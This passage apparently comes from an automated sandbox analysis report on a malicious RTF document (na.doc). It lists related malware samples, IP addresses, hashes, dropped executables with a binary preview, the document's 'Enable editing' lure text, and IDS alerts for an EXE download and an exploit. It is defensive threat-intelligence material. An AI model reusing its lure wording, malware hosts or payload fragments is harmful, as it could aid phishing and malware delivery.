                                                                                                          • 172.67.154.67
                                                                                                          PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 104.21.74.191
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                          • 188.114.97.3
                                                                                                          PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 104.21.74.191
                                                                                                          PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.3
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                          • 188.114.96.3
                                                                                                          UTMEMUS ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          SHARCOM-ASBGzxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                          • 87.120.84.39
                                                                                                          Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                                                                                                          • 87.120.84.38
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousFormBookBrowse
                                                                                                          • 87.120.84.38
                                                                                                          mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          05af1f5ca1b87cc9cc9b25185115607dPO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 188.114.96.3
                                                                                                          AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          1.rtfGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          36f7277af969a6947a61ae0b815907a1Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:@...e...........................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):756736
                                                                                                          Entropy (8bit):7.950147906141752
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:8oaDPw1Qk89TmyGHsxAJamiAHeKIH3jDcClP7QGymMDjg66zDJbHfO:8pLw9gTFGHsxsapIKDcU7iYDZ2
                                                                                                          MD5:53A7577C1DE37E54A78A2B918EB0D8BB
                                                                                                          SHA1:B51FE05023BACFBBB7B32A275BE601A4A5197203
                                                                                                          SHA-256:05328896CBA00F0F40A148E1EA739402B0D80546EB175B04D2D13FE8F7DF34B7
                                                                                                          SHA-512:AEEC560986568C336B9F1B6CE3AB9C158B10D2AF8620B9E0742CC57B15C400375AFEE2FA356D9DA0074FA47257436B66E5AC69C06112608E9351C2F9E87A0D00
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!g..............0..p............... ........@.. ....................................@.................................P...O....... ............................................................................ ............... ..H............text....o... ...p.................. ..`.rsrc... ............r..............@..@.reloc..............................@..B........................H........q...g...........................................................0...........(......(.....+..*...0...........(.......(.....+..*..0...........(........(.....+..*.0...........(.........(.....+..*....0...........(...........(.....+..*..0...........(.............(.....+..*....0.................(.......(.....+..*....0.................(........(.....+..*...0.................(.........(.....+..*..0.................(...........( ....+..*....0.................(.............(!.

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B51DF821-F86D-46B6-8ACC-37FF18353270}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{13FEA83D-5377-4786-9DD9-29F737F0C8E8}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):749056
                                                                                                          Entropy (8bit):3.4101208772922758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeN:Bcl
                                                                                                          MD5:D26FB13BDF4909E4F397977100E0605B
                                                                                                          SHA1:9878BCA0181802F21967ACD41E37DF40BC177AB8
                                                                                                          SHA-256:35B936A35819770C4910A446FBDB0C9C23387D3FD7A1902767C578BDA91FF78B
                                                                                                          SHA-512:CF4D08398DEB32778849ED7E372F379FE6975044F097CC2482888F7FD77DCA4877419E44CDC2DFF632FDCBC13D5A62A53F47C4BAB55D2172A0159DB44574572D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:6.0.7.8.9.7.9.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{18EB24B9-D74C-4691-AA6F-57A74C54BFE9}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1024
                                                                                                          Entropy (8bit):0.05390218305374581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                          Malicious:false
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9C8F7FC9-C865-4704-9DF5-6F224ABC8549}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1536
                                                                                                          Entropy (8bit):1.3496338424734096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbQ:IiiiiiiiiifdLloZQc8++lsJe1Mzj
                                                                                                          MD5:968316C7D9D8E4F927B9C150C254FB20
                                                                                                          SHA1:55461D40E591553A3EE4C16568E2D93607F21491
                                                                                                          SHA-256:0061B972D181908257A1E7658AF7EB740579C5FEB5F5F54CB598D8B9145CC3F7
                                                                                                          SHA-512:E146AE793A9FE582E4F4D1B486D6780C72F6850CA116F47B2237825C1BC9432112962CF32965ADA03A145711E5CEF65176A6A5324304BBBCD01A039B2A676A7B
                                                                                                          Malicious:false
                                                                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\3yrbiz3z.fqn.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\xxoncosu.mah.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38
                                                                                                          Entropy (8bit):4.195295934496219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:M19m42Uv:M9
                                                                                                          MD5:85AFAECA1F119568BFA70BB4ED76F108
                                                                                                          SHA1:13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
                                                                                                          SHA-256:3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
                                                                                                          SHA-512:4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
                                                                                                          Malicious:false
                                                                                                          Preview:[doc]..na.LNK=0..[folders]..na.LNK=0..

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\na.LNK

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Wed Oct 30 06:14:13 2024, length=957361, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):968
                                                                                                          Entropy (8bit):4.521400131831692
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8wa6E0gXg/XAlCPCHaXcB4LgB/qPX+WAaIXmicvbGI8DtZ3YilMMEpxRljKZTdIp:8wWk/XTMyg4+a0eKDDv3q057u
                                                                                                          MD5:5B895E2F499EF666822B61697C95B78D
                                                                                                          SHA1:3E56ADF5AB1EE56E93BF166B2B3738666D862499
                                                                                                          SHA-256:8063345562AE46EE697D3B934AA16CA9E41937FB6C5A5822DE84498034ABC59C
                                                                                                          SHA-512:DEB160842D308FE92161F6565FEE6CC47205E543F395FE077FADBF45DA317A1D1D5A96B9D066A8C74155C0D421488DE4B58CD92F73982F9B4517887097A7EE2E
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... .....2.r.....2.r...s..R.*...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....^Y.9..user.8......QK.X^Y.9*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2.....^Y.9 .na.doc..:.......WF..WF.*.........................n.a...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\na.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.a...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                          Malicious:false
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2
                                                                                                          Entropy (8bit):1.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                          Malicious:false
                                                                                                          Preview:..

                                                                                                          C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):756736
                                                                                                          Entropy (8bit):7.950147906141752
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:8oaDPw1Qk89TmyGHsxAJamiAHeKIH3jDcClP7QGymMDjg66zDJbHfO:8pLw9gTFGHsxsapIKDcU7iYDZ2
                                                                                                          MD5:53A7577C1DE37E54A78A2B918EB0D8BB
                                                                                                          SHA1:B51FE05023BACFBBB7B32A275BE601A4A5197203
                                                                                                          SHA-256:05328896CBA00F0F40A148E1EA739402B0D80546EB175B04D2D13FE8F7DF34B7
                                                                                                          SHA-512:AEEC560986568C336B9F1B6CE3AB9C158B10D2AF8620B9E0742CC57B15C400375AFEE2FA356D9DA0074FA47257436B66E5AC69C06112608E9351C2F9E87A0D00
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!g..............0..p............... ........@.. ....................................@.................................P...O....... ............................................................................ ............... ..H............text....o... ...p.................. ..`.rsrc... ............r..............@..@.reloc..............................@..B........................H........q...g...........................................................0...........(......(.....+..*...0...........(.......(.....+..*..0...........(........(.....+..*.0...........(.........(.....+..*....0...........(...........(.....+..*..0...........(.............(.....+..*....0.................(.......(.....+..*....0.................(........(.....+..*...0.................(.........(.....+..*..0.................(...........( ....+..*....0.................(.............(!.

                                                                                                          C:\Users\user\Desktop\~$na.doc

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                          Malicious:true
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65312), with CR line terminators
                                                                                                          Entropy (8bit):3.966189042553259
                                                                                                          TrID:
                                                                                                          • Rich Text Format (4004/1) 100.00%
                                                                                                          File name:na.doc
                                                                                                          File size:957'361 bytes
                                                                                                          MD5:84db82889d53879931a4551c5c81619b
                                                                                                          SHA1:29d3908cadf8833d5dfe8f46235fc332f16883af
                                                                                                          SHA256:3a3a4165f6e4845d27dcee1345e65abc27af1fbd2a9acb2e675faa02dd3dbe5f
                                                                                                          SHA512:40fac65a4cbae91a4d59ce8c130522d0e646c96d14663467549fdfba94af056922468a67c2a3d31928ba5cda7008da2ffb11406601b8d04f7ada77c6f3cf6bb8
                                                                                                          SSDEEP:6144:nwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAC:q
                                                                                                          TLSH:9A15292DD34B02598F620377AB571E5142BDBA7EF38552A1302C537933EAC3DA1252BE
                                                                                                          File Content Preview:{\rt..{\*\FADlXjX6sslendAfMOuifLgkgDdSADSn2EnrnHuyLDXx0h4liMrHfH0Oyh5MfxOM6hLIIK0vqi68p78b7SgUwgBgYYiyKW9ky1di5n65ulFqJneK6592VRWmy9Jx9o06BZTmBbUe4mjkUeu6Ae2YOUHqkvewBiEaGlcAccRkqAMUOaA4sZ9hdik1QHVaT97Lj0rURlFYnKui3VjQlFE}..{\460789795please click Enable

                                                                                                          File Icon

                                                                                                          Icon Hash:2764a3aaaeb7bdbf

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-10-30T08:14:18.649430+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1187.120.84.3880192.168.2.2249165TCP
                                                                                                          2024-10-30T08:14:18.981830+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2187.120.84.3880192.168.2.2249165TCP
                                                                                                          2024-10-30T08:14:18.981830+01002827449ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)187.120.84.3880192.168.2.2249165TCP
                                                                                                          2024-10-30T08:14:28.807025+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249166158.101.44.24280TCP
                                                                                                          2024-10-30T08:14:29.981164+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249166158.101.44.24280TCP
                                                                                                          2024-10-30T08:14:30.554577+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249168188.114.96.3443TCP
                                                                                                          2024-10-30T08:14:32.586408+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249169193.122.6.16880TCP
                                                                                                          2024-10-30T08:14:34.270927+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249171193.122.6.16880TCP
                                                                                                          2024-10-30T08:14:36.699659+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249174188.114.97.3443TCP
                                                                                                          2024-10-30T08:14:40.091187+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249178188.114.97.3443TCP
                                                                                                          2024-10-30T08:14:44.496057+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249182188.114.97.3443TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:14:17.699069023 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:17.704572916 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:17.704653978 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:17.704850912 CET4916580192.168.2.2287.120.84.38
